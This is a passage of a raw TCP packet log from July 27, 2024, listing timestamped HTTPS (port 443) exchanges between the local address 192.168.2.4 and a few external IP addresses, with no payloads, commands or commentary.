Jul 27, 2024 07:44:26.966655016 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.967327118 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.967386007 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.967400074 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.967423916 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.967453003 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.967472076 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.967494965 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.969053030 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.969109058 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.969131947 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.969146013 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.969173908 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.969196081 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.969388962 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.969451904 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.969505072 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.969563961 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.970660925 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.970765114 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.970793962 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.970875978 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.970879078 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.970897913 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.970966101 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.975682020 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.975735903 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.975749016 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.975794077 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.975811958 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.975822926 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.975850105 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.981118917 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.981177092 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.981189013 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.981210947 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.981244087 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.981259108 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.981281996 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.982201099 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.982256889 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.982269049 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.982315063 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.986385107 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.986445904 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.986463070 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.986525059 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.987076044 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.989943981 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.990009069 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.993094921 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.993160009 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.993206978 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.993268013 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.994872093 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.998404026 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.998464108 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.000195980 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.000262022 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.003328085 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.003391981 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.003416061 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.003478050 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.004786015 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.052043915 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.052174091 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059010029 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059083939 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059165955 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059225082 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059284925 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059345961 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059377909 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059433937 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059465885 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059528112 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059684992 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059743881 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059787035 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059848070 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059891939 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.059947968 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.059974909 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.060034990 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.060815096 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.060879946 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.061352968 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.061419010 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.061515093 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.061582088 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.061621904 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.061677933 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.061712980 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.061772108 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.061846018 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.061920881 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.061945915 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.062005997 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.062048912 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.062156916 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.062184095 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.062237024 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.063592911 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.063642025 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.438658953 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:27.438741922 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:27.441643953 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:27.441657066 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:27.441812038 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:27.441817999 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:27.442318916 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:27.442325115 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:27.442455053 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:27.443013906 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:27.443031073 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:27.487256050 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.547487020 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.547569036 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.547648907 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.548151970 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:27.548233986 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:27.799287081 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:27.799364090 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:27.800652981 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:27.801615953 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:27.801651001 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.186995029 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.188369036 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.188410044 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.277834892 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.278022051 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:28.280586004 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:28.280637980 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.281209946 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.282814980 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:28.282814980 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:28.283035994 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.283188105 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:28.283241987 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.331432104 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:28.331599951 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:28.331666946 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:28.348109961 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:28.348134041 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:28.348153114 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:28.348162889 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:28.462492943 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:28.462558985 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:28.462871075 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:28.463412046 CEST	62284	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:28.463442087 CEST	443	62284	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:28.497515917 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.497607946 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.497781992 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.497843027 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.502784967 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.502954006 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.503014088 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.503071070 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.508373976 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.508455992 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.575737000 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.575937986 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.585500002 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.585684061 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.585800886 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.585972071 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.586402893 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.586461067 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.595498085 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.595668077 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.600413084 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.600512981 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.610680103 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.610765934 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.615684986 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.615772963 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.625739098 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.625868082 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.674938917 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.675019026 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.675040007 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.675070047 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.675090075 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.675122023 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.675143003 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.675190926 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.676047087 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.676120043 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.676120996 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.676179886 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.676219940 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.676229954 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.676269054 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.676281929 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.676330090 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.677705050 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.677771091 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.677798033 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.677824974 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.677848101 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.677879095 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.683830976 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.683914900 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.688772917 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.688877106 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.696255922 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.696362019 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.699655056 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.699759007 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.702967882 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.703037977 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.709676027 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.709774971 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.712677956 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.712814093 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.762032032 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.762140036 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.762276888 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.762389898 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.762469053 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.762490034 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.762490034 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.762552977 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.762595892 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.762949944 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.763062000 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.763123035 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.763163090 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.763181925 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.763200998 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.763235092 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.766061068 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.766124964 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.766146898 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.766184092 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.766204119 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.766211987 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.766232014 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.771644115 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.771725893 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.771785975 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.771905899 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.772025108 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.772109985 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.772321939 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.772387028 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.776757002 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.776865005 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.780549049 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.780617952 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.784188986 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.784296989 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.784393072 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.784393072 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.784455061 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.784557104 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.787700891 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.787914991 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.791032076 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.791140079 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.791209936 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.791210890 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.791271925 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.792113066 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.792337894 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.792401075 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:28.794469118 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.794548035 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.794606924 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.794672012 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.797751904 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.797847033 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.800781965 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.800915003 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.800930977 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.800997019 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.801042080 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.803983927 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.804173946 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.804235935 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.804632902 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.821180105 CEST	62283	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:28.821238995 CEST	443	62283	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:28.823885918 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.851464987 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.851648092 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.851665974 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.851726055 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.851774931 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.851789951 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.851795912 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.851823092 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.851846933 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.851944923 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852078915 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852107048 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.852174044 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852215052 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852219105 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.852276087 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.852293015 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852344036 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852346897 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.852375031 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852402925 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.852577925 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852641106 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.852655888 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852705956 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852711916 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.852732897 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.852765083 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.853599072 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.853666067 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.853678942 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.853732109 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.853748083 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.853811026 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.853874922 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.854089975 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.854299068 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.854362011 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.854824066 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.854882002 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.854928017 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.854943991 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.854969978 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.854990005 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.855570078 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.855644941 CEST	62282	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:28.861103058 CEST	443	62282	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:28.861239910 CEST	443	62282	31.14.70.245	192.168.2.4
